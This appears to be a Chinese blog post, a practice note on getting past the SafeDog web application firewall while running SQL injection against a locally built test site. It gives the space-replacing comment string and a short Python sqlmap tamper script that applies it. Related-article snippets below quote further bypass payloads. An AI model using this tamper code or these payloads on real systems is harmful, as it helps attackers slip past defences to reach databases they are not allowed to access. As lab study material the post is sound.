sqlmap过狗脚本练习1

最新推荐文章于 2023-10-18 21:57:29 发布
最新推荐文章于 2023-10-18 21:57:29 发布
阅读量437 收藏 1
点赞数
分类专栏: python 渗透测试学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43727482/article/details/106375777
版权

本地搭建sql注入网站练习

测试安全狗,输入不合法参数被安全狗拦截:

使用sqlmap:

检测到防护机制,失败;

先手工尝试绕过安全狗:

将空格替换为  “/*//\*//\*\/c*/” 成功绕过安全狗;

写个sqlmap脚本:

#demo.py
def tamper(payload,**kwargs):
    retVal = payload
    quote=False
    if payload:
        retVal = ''
        for i in payload:
            if i =="'" and i=='"':
                quote = not quote
            elif i.isspace() and not quote:
                retVal+='/*//\*//\*\/c*/'
            else:
                retVal+=i
    return retVal

加上脚本继续跑:

成功!(之后试了几次就不行了,与安全狗的检测机制有关。。。)

me晴天
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap tamper脚本编写
m0_56578216的博客
09-22 480
SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到绕过某些限制的目的。但是有些时候,SQLMap 自带的Tamper 脚本并不是特别好用,需要根据实际情况定制Tamper 脚本sqlmap的编写语言也是python,tamper脚本能增强sqlmap的功能,达到绕过检测的目的。
一款轻量级Web漏洞教学演示系统1
08-03
该系统由sqlmap的作者Miroslav Stampar创建,支持多种流行的Web漏洞环境和攻击方法,并附带相关说明和介绍链接。 DSVW的运行依赖Python 2.6.x或2.7.x以及python-lxml库。安装过程简单,只需从GitHub克隆或下载dsvw....
19.sqlmap饶过waf安全
weixin_46525626的博客
07-13 762
因为大都是通过的方式进行拦截,所以如果出现了被拦截的情况,大概率是因为你的语句的触发了黑名单的验证机制,导致被拦截,那应该怎么检测呢?其实就行了,输入页面,如下说明“and 1”这个部分触发了拦截,此时的绕过方式可以选择替换或者绕过,这里我们先试试对中间的空格进行替换,空格的替换方式尤其多,我们不可能全部都能记住,所以这里就要FUZZ绕过方式一:IP白奖单从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。
sqlmap之绕过安全
qq_50854662的博客
01-05 6035
sqlmap之绕过安全
【Python脚本SQLMap的Tamper脚本——绕过安全
最新发布
weixin_55205599的博客
10-18 451
针对WAF编写Tamper脚本进行绕过安装网站安全,此时再次尝试SQL注入时,安全会拦截。
p79 Python 开发-sqlmapapi&Tamper&Pocsuite(含安全的安装与开启网站防护)
weixin_43263566的博客
03-10 1104
Python 开发-sqlmapapi&Tamper&Pocsuite
java安卓辅助源码-github_arsenal:github军火库
06-04
java安卓辅助源码 github_arsenal github军火库 漏洞及渗透练习平台: WebGoat漏洞练习环境 Damn Vulnerable Web Application(漏洞练习平台) 数据库注入练习平台 用node编写的漏洞练习平台,like ...自动化绕过
java安卓辅助源码-pentest-tools:渗透测试必备工具
06-04
java安卓辅助源码 -渗透测试必备工具 网上看到渗透测试工具总结不错的文章,转发过来供大家一起学习,链接为: 以及 如有问题,请联系我!...Web代理,通过加载sqlmap api进行sqli实时检测 新版中国菜刀 .git泄
nodejs-websocket-sqli:一个简单的NodeJS WebSocket WebApp容易受到盲SQL注入
04-06
NodeJS WebSocket SQLi易受攻击的WebApp ... 构建一个中间件HTTP Server脚本以将SQLMap有效负载中继到WebSocket。 在这里查看我分享了上一个练习的博客文章: : 跑步 运行: docker-compose up 造访: 屏幕截图
web安全渗透测试.7z
04-08
1. **lanmp.sh** - 这可能是一个安装LAMP(Linux, Apache, MySQL, PHP)环境的脚本,是进行Web开发和测试的标准配置。 2. **第四章所有源码** - 可能包含了某个教程或书籍的第四章中的Web应用源代码,供学习和分析...
最新棒SQLMAP 含过
07-06
当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。
sqlmap脚本
03-08
sqlmap绕过安全脚本 源自github sqlmap绕过安全脚本 来源自github
使用sqlmap绕过过滤
08-05
该文档讲解了如何使用sqlmap绕过过滤手段的方法,有兴趣的可以下载看看
绕过安全继续注入的思路
08-30
绕过安全继续注入的思路。
SQL注入绕过安全的五种方法
01-11 1298
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF
ran的博客
01-25 2700
此时可以在SQLMAP的命令里加入“--random-agent”参数,此参数的作用是使User-Agent后面的值按照其字典随机出现。因此就需要我们自己来写脚本,在自己写脚本的过程中可以参考“tamper”下的脚本,可以对里面的脚本进行修改。在漏洞防护规则里可以看到包含一种名为“工具拦截”的检测类型,当其发现是使用sqlmap工具时,就会进行拦截。但是这些默认的脚本必然是不能绕过我们现在常见的一些WAF的(可以绕过一些比赛的拦截规则,如CTF比赛等)。可以看到此时网站可以正常访问,可以进行正常注入。
SQL注入绕过安全
qq_45462249的博客
07-15 1355
网站安全是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具,WAF检测一般分为两种,一种白名单,一种黑名单。白名单相对于黑名单来说,更加安全,但是白名单由于设置的比较严格,有时会影响用户的正常访问,所以WAF还是用黑名单的比较多。后面接数据库版本号时,如果自身版本号大于等于字符数,就会将注释中的内容执行,否则就会当做注释来处理。查询这些分别注意union和select连接,from和表连接,还有database()括号的连接,需要用到以上方法结合起来。...
SQL注入-安全apache绕过
遇事不决冲冲冲
05-26 2533
环境配置 Windows 10 phpstudy sqli-labs靶场 安全apache4.0.30255
第19天-WEB漏洞-SQL注入之SQLMAP绕过WAF
MCTSOG的博客
03-03 1854
在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便我们更灵活地去构造 Payload,从而可以和各种WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用。 数据库特性(补充) %23x%0aunion%23x%0Aselect%201,2,3 %20/!44509union/%23x%0aselect%201,2,3 id=1/**&id=-1%20union%20select%201,2,3%23*/ %20union%20all%23%0a%20select%20
sqlmap绕过安全
08-25
对于绕过安全的问题,我必须强调尊重法律和道德规范,不鼓励或提供任何违法或不当的行为。绕过安全等安全措施是非法的,并可能导致法律后果。 如果您是合法授权的安全测试人员,可以基于合法的测试范围和授权...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值